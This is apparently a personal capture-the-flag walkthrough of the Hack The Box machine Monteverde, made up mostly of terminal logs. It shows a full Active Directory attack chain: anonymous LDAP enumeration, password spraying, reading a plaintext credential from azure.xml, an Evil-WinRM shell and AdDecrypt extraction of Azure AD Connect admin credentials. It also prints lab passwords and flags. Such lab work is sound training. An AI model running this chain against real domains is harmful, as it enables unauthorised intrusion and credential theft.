nmap scan
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ nmap -sV -sC -oA mantis 10.10.10.172 -pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-24 07:41 EDT
zsh: segmentation fault nmap -sV -sC -oA mantis 10.10.10.172 -pn
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ nmap -sV -sC -oA Monteverde 10.10.10.172 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-24 07:41 EDT
Nmap scan report for 10.10.10.172
Host is up (0.36s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-24 11:42:15Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-09-24T11:42:53
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.93 seconds
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$
Running a full scan in the background to check later if any other new ports
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u '' -p ''
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\:
┌──(kali㉿kali)-[~/HTB/Monteverde]
adding the domain to the hosts file
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.175 EGOTISTICAL-BANK.LOCAL
10.10.10.100 active.htb htb
10.10.10.192 blackfield.local
10.10.10.182 cascade.local
10.10.11.152 timelapse.htb
10.10.10.169 megabank.local resolute.megabank.local
10.10.10.52 htb.local mantis.htb.local
10.10.10.179 MEGACORP.LOCAL MULTIMASTER.MEGACORP.LOCAL
10.10.10.172 MEGABANK.LOCAL MONTEVERDE.MEGABANK.LOCAL
doing an ldpsearch and we get some users
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ ldapsearch -x -H ldap://10.10.10.172 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=MEGABANK,DC=LOCAL
namingcontexts: CN=Configuration,DC=MEGABANK,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=MEGABANK,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=MEGABANK,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ ldapsearch -x -H ldap://10.10.10.172 -b 'DC=megabank,DC=local' -s sub '(objectClass=person)' sAMAccountName | grep 'sAMAccountName:' | awk -F ': ' '{print $2}'
Guest
MONTEVERDE$
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$
adding the names to a text file users.txt
using kerbrute to check which are valid
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ ./kerbrute userenum --dc 10.10.10.172 -d megabank.LOCAL users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/24/23 - Ronnie Flathers @ropnop
2023/09/24 07:53:54 > Using KDC(s):
2023/09/24 07:53:54 > 10.10.10.172:88
2023/09/24 07:53:55 > [+] VALID USERNAME: [email protected]
2023/09/24 07:53:55 > [+] VALID USERNAME: [email protected]
2023/09/24 07:53:55 > [+] VALID USERNAME: [email protected]
2023/09/24 07:53:55 > [+] VALID USERNAME: [email protected]
2023/09/24 07:53:55 > [+] VALID USERNAME: [email protected]
2023/09/24 07:53:55 > [+] VALID USERNAME: [email protected]
2023/09/24 07:53:55 > [+] VALID USERNAME: [email protected]
2023/09/24 07:53:55 > [+] VALID USERNAME: [email protected]
2023/09/24 07:53:55 > [+] VALID USERNAME: [email protected]
2023/09/24 07:53:55 > [+] VALID USERNAME: [email protected]
2023/09/24 07:53:55 > [+] VALID USERNAME: [email protected]
2023/09/24 07:53:55 > Done! Tested 11 usernames (11 valid) in 0.864 seconds
┌──(kali㉿kali)-[~/HTB/Monteverde]
Trying to see which we can get a hash but we get nothing
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ while read -r user; do
./GetNPUsers.py megabank.LOCAL/$user -no-pass -dc-ip 10.10.10.172
done < /home/kali/HTB/Monteverde/users.txt
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for administrator
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for MONTEVERDE$
[-] User MONTEVERDE$ doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for AAD_987d7f2f57d2
[-] User AAD_987d7f2f57d2 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for mhope
[-] User mhope doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for SABatchJobs
[-] User SABatchJobs doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for svc-ata
[-] User svc-ata doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for svc-bexec
[-] User svc-bexec doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for svc-netapp
[-] User svc-netapp doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for dgalanos
[-] User dgalanos doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for roleary
[-] User roleary doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for smorgan
[-] User smorgan doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$
check descriptions via ldapsearch but nothing
└─$ ldapsearch -x -H ldap://10.10.10.172 -b "DC=megabank,DC=local" -s sub "(objectClass=user)" sAMAccountName description
# extended LDIF
#
# LDAPv3
# base <DC=megabank,DC=local> with scope subtree
# filter: (objectClass=user)
# requesting: sAMAccountName description
#
# Guest, Users, MEGABANK.LOCAL
dn: CN=Guest,CN=Users,DC=MEGABANK,DC=LOCAL
description: Built-in account for guest access to the computer/domain
sAMAccountName: Guest
# MONTEVERDE, Domain Controllers, MEGABANK.LOCAL
dn: CN=MONTEVERDE,OU=Domain Controllers,DC=MEGABANK,DC=LOCAL
sAMAccountName: MONTEVERDE$
# AAD_987d7f2f57d2, Users, MEGABANK.LOCAL
dn: CN=AAD_987d7f2f57d2,CN=Users,DC=MEGABANK,DC=LOCAL
description: Service account for the Synchronization Service with installation
identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVER
DE.
sAMAccountName: AAD_987d7f2f57d2
# Mike Hope, London, MegaBank Users, MEGABANK.LOCAL
dn: CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
sAMAccountName: mhope
# SABatchJobs, Service Accounts, MEGABANK.LOCAL
dn: CN=SABatchJobs,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
sAMAccountName: SABatchJobs
# svc-ata, Service Accounts, MEGABANK.LOCAL
dn: CN=svc-ata,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
sAMAccountName: svc-ata
# svc-bexec, Service Accounts, MEGABANK.LOCAL
dn: CN=svc-bexec,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
sAMAccountName: svc-bexec
# svc-netapp, Service Accounts, MEGABANK.LOCAL
dn: CN=svc-netapp,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
sAMAccountName: svc-netapp
# Dimitris Galanos, Athens, MegaBank Users, MEGABANK.LOCAL
dn: CN=Dimitris Galanos,OU=Athens,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
sAMAccountName: dgalanos
# Ray O'Leary, Toronto, MegaBank Users, MEGABANK.LOCAL
dn: CN=Ray O'Leary,OU=Toronto,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
sAMAccountName: roleary
# Sally Morgan, New York, MegaBank Users, MEGABANK.LOCAL
dn: CN=Sally Morgan,OU=New York,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
sAMAccountName: smorgan
# search reference
ref: ldap://ForestDnsZones.MEGABANK.LOCAL/DC=ForestDnsZones,DC=MEGABANK,DC=LOC
AL
# search reference
ref: ldap://DomainDnsZones.MEGABANK.LOCAL/DC=DomainDnsZones,DC=MEGABANK,DC=LOC
AL
# search reference
ref: ldap://MEGABANK.LOCAL/CN=Configuration,DC=MEGABANK,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 15
# numEntries: 11
# numReferences: 3
also checked for custom objects but nothing pops out.excerpt below
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ldapsearch -x -H ldap://10.10.10.172 -b 'DC=megabank,DC=local' -s sub | awk '{print $1}' | sort | uniq -c | sort -nr
697 dSCorePropagationData:
548 objectClass:
281 #
272
267 dn:
246 whenCreated:
246 whenChanged:
246 uSNCreated:
246 uSNChanged:
246 objectGUID::
246 objectCategory:
246 name:
246 instanceType:
246 distinguishedName:
222 cn:
177 showInAdvancedViewOnly:
102 System,DC=MEGABANK,DC=LOCAL
88 BANK.LOCAL
87 mainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
87 isCriticalSystemObject:
trying rpcclient . we find the same users
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ rpcclient -U '' -N 10.10.10.172
rpcclient
gt; lookup smorgan command not found: lookup rpcclient
gt; lookupnames smorgan result was NT_STATUS_ACCESS_DENIED rpcclient
gt; lookupnames SABatchJobs result was NT_STATUS_ACCESS_DENIED rpcclient
gt; enumdomusers user:[Guest] rid:[0x1f5] user:[AAD_987d7f2f57d2] rid:[0x450] user:[mhope] rid:[0x641] user:[SABatchJobs] rid:[0xa2a] user:[svc-ata] rid:[0xa2b] user:[svc-bexec] rid:[0xa2c] user:[svc-netapp] rid:[0xa2d] user:[dgalanos] rid:[0xa35] user:[roleary] rid:[0xa36] user:[smorgan] rid:[0xa37] rpcclient
gt; rpcclient
gt; enumdomgroups group:[Enterprise Read-only Domain Controllers] rid:[0x1f2] group:[Domain Users] rid:[0x201] group:[Domain Guests] rid:[0x202] group:[Domain Computers] rid:[0x203] group:[Group Policy Creator Owners] rid:[0x208] group:[Cloneable Domain Controllers] rid:[0x20a] group:[Protected Users] rid:[0x20d] group:[DnsUpdateProxy] rid:[0x44e] group:[Azure Admins] rid:[0xa29] group:[File Server Admins] rid:[0xa2e] group:[Call Recording Admins] rid:[0xa2f] group:[Reception] rid:[0xa30] group:[Operations] rid:[0xa31] group:[Trading] rid:[0xa32] group:[HelpDesk] rid:[0xa33] group:[Developers] rid:[0xa34] rpcclient
gt;
trying to enumerate the shares
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u '' -p ''
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\:
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u '' -p '' --shares
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\:
SMB 10.10.10.172 445 MONTEVERDE [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ smbclient -L //10.10.10.172
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ smbclient -L //10.10.10.172 -N -U%
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Running out of options. Will try create a password list to brutforce using,
First we check the password policy and we can see “Account Lockout Threshold: None”
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 --pass-pol
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] Dumping password info for domain: MEGABANK
SMB 10.10.10.172 445 MONTEVERDE Minimum password length: 7
SMB 10.10.10.172 445 MONTEVERDE Password history length: 24
SMB 10.10.10.172 445 MONTEVERDE Maximum password age: 41 days 23 hours 53 minutes
SMB 10.10.10.172 445 MONTEVERDE
SMB 10.10.10.172 445 MONTEVERDE Password Complexity Flags: 000000
SMB 10.10.10.172 445 MONTEVERDE Domain Refuse Password Change: 0
SMB 10.10.10.172 445 MONTEVERDE Domain Password Store Cleartext: 0
SMB 10.10.10.172 445 MONTEVERDE Domain Password Lockout Admins: 0
SMB 10.10.10.172 445 MONTEVERDE Domain Password No Clear Change: 0
SMB 10.10.10.172 445 MONTEVERDE Domain Password No Anon Change: 0
SMB 10.10.10.172 445 MONTEVERDE Domain Password Complex: 0
SMB 10.10.10.172 445 MONTEVERDE
SMB 10.10.10.172 445 MONTEVERDE Minimum password age: 1 day 4 minutes
SMB 10.10.10.172 445 MONTEVERDE Reset Account Lockout Counter: 30 minutes
SMB 10.10.10.172 445 MONTEVERDE Locked Account Duration: 30 minutes
SMB 10.10.10.172 445 MONTEVERDE Account Lockout Threshold: None
SMB 10.10.10.172 445 MONTEVERDE Forced Log off Time: Not Set
Creating a password list with john the reaper
└─$ john --wordlist=users.txt --rules --stdout > users2.txt
using crackmapexec to try and bruteforce
[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u users.txt -p users4.txt
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
user SABatchJobs and password SABatchJobs
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u SABatchJobs -p SABatchJobs --shares
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
SMB 10.10.10.172 445 MONTEVERDE [+] Enumerated shares
SMB 10.10.10.172 445 MONTEVERDE Share Permissions Remark
SMB 10.10.10.172 445 MONTEVERDE ----- ----------- ------
SMB 10.10.10.172 445 MONTEVERDE ADMIN$ Remote Admin
SMB 10.10.10.172 445 MONTEVERDE azure_uploads READ
SMB 10.10.10.172 445 MONTEVERDE C$ Default share
SMB 10.10.10.172 445 MONTEVERDE E$ Default share
SMB 10.10.10.172 445 MONTEVERDE IPC$ READ Remote IPC
SMB 10.10.10.172 445 MONTEVERDE NETLOGON READ Logon server share
SMB 10.10.10.172 445 MONTEVERDE SYSVOL READ Logon server share
SMB 10.10.10.172 445 MONTEVERDE users$ READ
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec winrm 10.10.10.172 -u SABatchJobs -p SABatchJobs --shares
usage: crackmapexec [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--darrell]
[--verbose]
{ldap,smb,mssql,rdp,ftp,winrm,ssh} ...
crackmapexec: error: unrecognized arguments: --shares
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec winrm 10.10.10.172 -u SABatchJobs -p SABatchJobs
SMB 10.10.10.172 5985 MONTEVERDE [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
HTTP 10.10.10.172 5985 MONTEVERDE [*] http://10.10.10.172:5985/wsman
WINRM 10.10.10.172 5985 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ smbclient //10.10.10.172/users$ -U SABatchJobs%SABatchJobs
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jan 3 08:12:48 2020
.. D 0 Fri Jan 3 08:12:48 2020
dgalanos D 0 Fri Jan 3 08:12:30 2020
mhope D 0 Fri Jan 3 08:41:18 2020
roleary D 0 Fri Jan 3 08:10:30 2020
smorgan D 0 Fri Jan 3 08:10:24 2020
31999 blocks of size 4096. 28979 blocks available
smb: \> cd dgalanos\
smb: \dgalanos\> ls
. D 0 Fri Jan 3 08:12:30 2020
.. D 0 Fri Jan 3 08:12:30 2020
cd .
31999 blocks of size 4096. 28979 blocks available
smb: \dgalanos\> cd ../
smb: \> cd mhop
cd \mhop\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \> cd mhope
smb: \mhope\> ls
. D 0 Fri Jan 3 08:41:18 2020
.. D 0 Fri Jan 3 08:41:18 2020
azure.xml AR 1212 Fri Jan 3 08:40:23 2020
31999 blocks of size 4096. 28979 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \mhope\> cd ../
smb: \> cd rolearty
cd \rolearty\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \> cd roleary
smb: \roleary\> ls
. D 0 Fri Jan 3 08:10:30 2020
.. D 0 Fri Jan 3 08:10:30 2020
cd ../
31999 blocks of size 4096. 28979 blocks available
smb: \roleary\> cd ../
smb: \> cd smorgan
smb: \smorgan\> ls
. D 0 Fri Jan 3 08:10:24 2020
.. D 0 Fri Jan 3 08:10:24 2020
31999 blocks of size 4096. 28979 blocks available
smb: \smorgan\> ^C
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ smbclient //10.10.10.172/azure_uploads -U SABatchJobs%SABatchJobs
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jan 3 07:43:06 2020
.. D 0 Fri Jan 3 07:43:06 2020
31999 blocks of size 4096. 28979 blocks available
smb: \> SMBecho failed (NT_STATUS_CONNECTION_RESET). The connection is disconnected now
checking the xml file
└─$ cat azure.xml
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r
lt;/S> </Props> </Obj> </Objs> ┌──(kali㉿kali)-[~/HTB/Monteverde] └─$
we see a password in there 4n0therD4y@n0th3r$
we try and check the password against the users and we get that this is the password for mhope
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ ls
azure.xml mantis.gnmap mantis.xml Monteverde.nmap users2.txt users4.txt
kerbrute mantis.nmap Monteverde.gnmap Monteverde.xml users3.txt users.txt
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ nano users.txt
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.179 -u users.txt -p '4n0therD4y@n0th3r'
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u users.txt -p '4n0therD4y@n0th3r'
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\administrator:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$
we are able to test and get in with evilwinrm
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec winrm 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r'
SMB 10.10.10.172 5985 MONTEVERDE [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
HTTP 10.10.10.172 5985 MONTEVERDE [*] http://10.10.10.172:5985/wsman
WINRM 10.10.10.172 5985 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ evil-winrm -i 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> cd ../
*Evil-WinRM* PS C:\Users\mhope> cd Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> cat user.txt
bfec682a8877066eb64829042af046a4
*Evil-WinRM* PS C:\Users\mhope\Desktop>
Priv escalation
download and run winpeas
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ evil-winrm -i 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r'
winpeas suggested to look at file “RoamingCredentialSettings.xml” so downloaded it
*Evil-WinRM* PS C:\users\all users\Microsoft\uEV\InboxTemplates> get RoamingCredentialSettings.xml
The term 'get' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ get RoamingCredentialSettings.xml
+ ~~~
+ CategoryInfo : ObjectNotFound: (get:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\users\all users\Microsoft\uEV\InboxTemplates> download RoamingCredentialSettings.xml
Info: Downloading C:\users\all users\Microsoft\uEV\InboxTemplates\RoamingCredentialSettings.xml to RoamingCredentialSettings.xml
Info: Download successful!
*Evil-WinRM* PS C:\users\all users\Microsoft\uEV\InboxTemplates>
nothing much in that file
└─$ cat RoamingCredentialSettings.xml
<?xml version="1.0" encoding="utf-8"?>
<!--
Modifying the settings location templates for an application or a
Windows setting group provided with Microsoft User Experience Virtualization
may cause synchronization for the modified settings to fail.
For more information about settings location templates please see
the UE-V product documentation. http://go.microsoft.com/fwlink/?LinkId=260889
-->
<SettingsLocationTemplate xmlns='http://schemas.microsoft.com/UserExperienceVirtualization/2013/SettingsLocationTemplate'>
<!-- Roaming Credential settings -->
<Name>Roaming Credential Settings</Name>
<ID>RoamingCredentialSettings</ID>
<LocalizedNames>
<Name Locale='en-us'>Roaming Credential Settings</Name>
<Name Locale='cs-cz'>Nastavení cestovních přihlašovacích údajů</Name>
<Name Locale='da-dk'>Indstillinger for roaminglegitimationsoplysninger</Name>
<Name Locale='de-de'>Einstellungen für servergespeicherte Anmeldeinformationen</Name>
<Name Locale='el-gr'>Ρυθμίσεις διαπιστευτηρίων περιαγωγής</Name>
<Name Locale='es-es'>Configuración de credenciales móviles</Name>
<Name Locale='fi-fi'>Verkkovierailutunnistetietojen asetukset</Name>
<Name Locale='fr-fr'>Paramètres d’informations d’identification itinerants</Name>
<Name Locale='hu-hu'>Hordozható hitelesítőadat-beállítások</Name>
<Name Locale='it-it'>Impostazioni per le credenziali di roaming</Name>
<Name Locale='ja-jp'>移動資格情報の設定</Name>
<Name Locale='ko-kr'>로밍 자격 증명 설정</Name>
<Name Locale='nb-no'>Innstillinger for sentrallegitimasjon</Name>
<Name Locale='nl-nl'>Referentie-instellingen voor roaming</Name>
<Name Locale='pl-pl'>Ustawienia poświadczeń mobilnych</Name>
<Name Locale='pt-br'>Configurações de Credenciais de Roaming</Name>
<Name Locale='pt-pt'>Definições de Credencial de Roaming</Name>
<Name Locale='ru-ru'>Параметры перемещаемых учетных данных</Name>
<Name Locale='sk-sk'>Nastavenia zdieľania poverení</Name>
<Name Locale='sl-si'>Nastavitve poverilnic za gostovanje</Name>
<Name Locale='sv-se'>Autentiseringsinställningar för nätverksväxling</Name>
<Name Locale='tr-tr'>Dolaşım Kimlik Bilgileri Ayarları</Name>
<Name Locale='zh-cn'>漫游凭据设置</Name>
<Name Locale='zh-tw'>漫遊認證設定</Name>
</LocalizedNames>
<Version>0</Version>
<DeferToMSAccount/>
<Processes>
<ShellProcess/>
</Processes>
<Settings>
<File>
<Root>
<EnvironmentVariable>USERPROFILE</EnvironmentVariable>
</Root>
<Path Recursive="true">AppData\Roaming\Microsoft\Credentials</Path>
</File>
<File>
<Root>
<EnvironmentVariable>USERPROFILE</EnvironmentVariable>
</Root>
<Path Recursive="true">AppData\Roaming\Microsoft\Crypto</Path>
</File>
<File>
<Root>
<EnvironmentVariable>USERPROFILE</EnvironmentVariable>
</Root>
<Path Recursive="true">AppData\Roaming\Microsoft\Protect</Path>
</File>
<File>
<Root>
<EnvironmentVariable>USERPROFILE</EnvironmentVariable>
</Root>
<Path Recursive="true">AppData\Roaming\Microsoft\SystemCertificates</Path>
</File>
</Settings>
</SettingsLocationTemplate>
┌──(kali㉿kali)-[~/HTB/Monteverde]
this exploit is available for privesc
Link https://vbscrub.com/2020/01/14/azure-ad-connect-database-exploit-priv-esc/
Command to run
AdDecrypt.exe -FullSQL_
This program must be run while the AD Sync Bin folder is your “working directory”, or has been added to the PATH variable. An easy way to do this is simply navigate to the folder in Powershell or Command Prompt (i.e _cd “C:\Program Files\Microsoft Azure AD Sync\Bin”_), and then run the program by typing the full path to wherever you have stored it. You also need to make sure the mcrypt.dll from the download link is in the same directory the program is in. Failure to do either of these things will result in a Module Not Found error
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:\Users\mhope\Documents\ADdecrypt\AdDecrypt.exe -FullSQL
======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================
Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!
DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin>
trying evilwinrm
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ evil-winrm -i 10.10.10.172 -u administrator -p d0m@in4dminyeah!
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
f77447ffe7a3e4cb40da45e8d46202ec
*Evil-WinRM* PS C:\Users\Administrator\Desktop>